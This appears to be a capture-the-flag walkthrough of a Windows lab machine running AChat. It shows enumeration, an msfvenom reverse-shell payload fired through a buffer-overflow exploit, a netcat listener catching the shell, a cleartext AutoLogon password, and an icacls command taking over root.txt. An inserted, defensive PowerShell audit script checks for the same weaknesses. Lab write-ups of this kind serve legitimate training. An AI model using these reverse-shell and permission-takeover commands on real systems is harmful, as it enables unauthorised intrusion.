ENUMERATION

9255/tcp open  http    syn-ack AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   syn-ack AChat chat system

We cannot access the HTTP site via a browser for some reason, so after some googling we find this blog and search for buffer overflow exploits.

FOOTHOLD

Searchsploit returns two exploits, and we go with the non-Metasploit one:

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' -e x86/unicode_mixed BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ python2 exploit.py
---->{P00F}!

After running the commands above, we get a reverse shell back on our listener (note: the exploit has to be run quite a few times before it works):

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd ..
C:\Users\Alfred\Desktop

PRIVILEGE ESCALATION

Running winPEAS, we see the following notable results:

[?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
    (CHATTERBOX\Alfred) Reset AChat service: "C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat" 
    Permissions file: Alfred [AllAccess]
    Permissions folder(DLL Hijacking): Alfred [AllAccess]

[+] Looking if you can modify any service registry
   [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions
    HKLM\system\currentcontrolset\services\Dnscache (Interactive [CreateSubKey], Users [CreateSubKey])
    HKLM\system\currentcontrolset\services\RpcEptMapper (Authenticated Users [CreateSubKey], Users [CreateSubKey])

[+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!
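As an added defender-side check (not code from the writeup or from winPEAS), the PowerShell script below re-tests the three findings above on the host itself: a cleartext AutoLogon password, an autorun binary or its folder writable by a non-admin principal, and service registry keys that grant CreateSubKey or SetValue to ordinary users. The Winlogon key path and the trusted-principal allowlist are my assumptions; the file path and service keys are the ones winPEAS printed.

```powershell
# Added audit script; not part of the original writeup. Run in an elevated PowerShell
# on the host. The paths and keys are the ones winPEAS reported above; edit for other hosts.
$WinlogonKey     = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$AutorunBinaries = @('C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat')
$ServiceKeys     = @('HKLM:\SYSTEM\CurrentControlSet\Services\Dnscache',
                     'HKLM:\SYSTEM\CurrentControlSet\Services\RpcEptMapper')
# Principals allowed to hold write rights (assumed allowlist); CREATOR OWNER is a default inherit-only placeholder.
$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
# Only write-type bits: Modify/ReadAndExecute and WriteKey/ReadKey share read bits and would flag read-only ACEs.
$FileWriteBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'
$RegWriteBits  = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
function Test-AutoLogonPassword {
    # AutoLogon keeps DefaultPassword in cleartext, and the Winlogon key is readable by any local user.
    $wl = Get-ItemProperty -Path $WinlogonKey -ErrorAction SilentlyContinue
    if ($wl -and $wl.DefaultPassword) {
        "[!] Cleartext AutoLogon password for '$($wl.DefaultUserName)' under $WinlogonKey"
    }
}
function Test-WritableAutorun {
    # Checks the binary and its folder: a writable folder is the 'DLL Hijacking' finding above.
    foreach ($bin in $AutorunBinaries) {
        foreach ($path in @($bin, (Split-Path -Parent $bin))) {
            if (-not (Test-Path -Path $path)) { continue }
            foreach ($ace in (Get-Acl -Path $path).Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    (($ace.FileSystemRights -band $FileWriteBits) -ne 0) -and
                    ($TrustedPrincipals -notcontains $ace.IdentityReference.Value)) {
                    "[!] $($ace.IdentityReference) can modify $path ($($ace.FileSystemRights))"
                }
            }
        }
    }
}
function Test-WritableServiceKey {
    # CreateSubKey/SetValue on a service key lets a non-admin change configuration the SCM trusts at start-up.
    foreach ($key in $ServiceKeys) {
        foreach ($ace in (Get-Acl -Path $key).Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                (($ace.RegistryRights -band $RegWriteBits) -ne 0) -and
                ($TrustedPrincipals -notcontains $ace.IdentityReference.Value)) {
                "[!] $($ace.IdentityReference) has $($ace.RegistryRights) on $key"
            }
        }
    }
}
Test-AutoLogonPassword; Test-WritableAutorun; Test-WritableServiceKey
```

Each reported line maps to one winPEAS finding above; an empty run means none of the three weaknesses is present on that host.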

We also see that we have access to the Administrator's Desktop, but we cannot read root.txt.

On searching for the reason, we come across this thread of questions.

And we can execute this command to get access to root.txt:

C:\Users\Administrator\Desktop>icacls root.txt /t /c /GRANT Everyone:F
icacls root.txt /t /c /GRANT Everyone:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>more root.txt